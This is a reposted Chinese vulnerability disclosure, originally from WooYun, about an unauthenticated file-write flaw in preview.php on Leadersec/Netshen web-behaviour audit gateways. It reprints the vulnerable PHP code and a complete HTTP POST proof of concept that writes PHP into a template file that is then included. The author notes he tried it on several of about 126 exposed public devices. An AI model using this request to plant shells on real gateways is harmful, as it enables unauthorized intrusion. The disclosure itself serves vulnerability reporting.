首页 > 代码库 > [漏洞]Leadersec网御安全网关-网上行为(审计)设备系统通用型getshell(无需登录涉及网神&网御星云等厂商)漏洞 验证

[漏洞]Leadersec网御安全网关-网上行为(审计)设备系统通用型getshell(无需登录涉及网神&网御星云等厂商)漏洞 验证

 

技术分享

大概涉及公网126台网关设备,试了几台。登录页面

技术分享

 

缺陷编号: WooYun-2016-171016漏洞标题: 某网上行为(审计)设备系统通用型getshell(无需登录涉及网神&网御星云等厂商)相关厂商: 网神信息技术(北京)股份有限公司漏洞作者: Ano_Tom认证白帽子提交时间: 2016-01-19 09:14公开时间: 2016-04-11 16:08漏洞类型: 网络未授权访问危害等级: 高自评Rank: 20漏洞状态: 厂商已经确认漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.orgTags标签: 任意命令执行

 

根目录下preview.php文件具有任意内容写入的漏洞,可以直接写入shell。

code 区域
if(isset($_POST[‘previewtxt‘]))
{
$index = $_POST[‘previewtxt‘];
$index = str_replace("&lt;","<",$index);
$index = str_replace("&gt;",">",$index);
$index = stripslashes($index);

$fp = fopen("/usr/hddocs/nsg/template/___index.php","w");
fwrite($fp,$index);
fclose($fp);
require_once("/usr/hddocs/nsg/head_index.php");
require_once("/usr/hddocs/nsg/template/___index.php");
}



写入的文件地址为template/___index.php。

 

漏洞证明:

网神科技的设备

code 区域
网神
POST /preview.php HTTP/1.1
Host: **.**.**.**:8443
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=8b7bf4198d6bccbe7d68fedf3f8287cc
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

previewtxt=<?php phpinfo();?>



 

技术分享

 

技术分享

 

修复方案:

php函数有相关的安全配置,设置访问权限。

 

[漏洞]Leadersec网御安全网关-网上行为(审计)设备系统通用型getshell(无需登录涉及网神&网御星云等厂商)漏洞 验证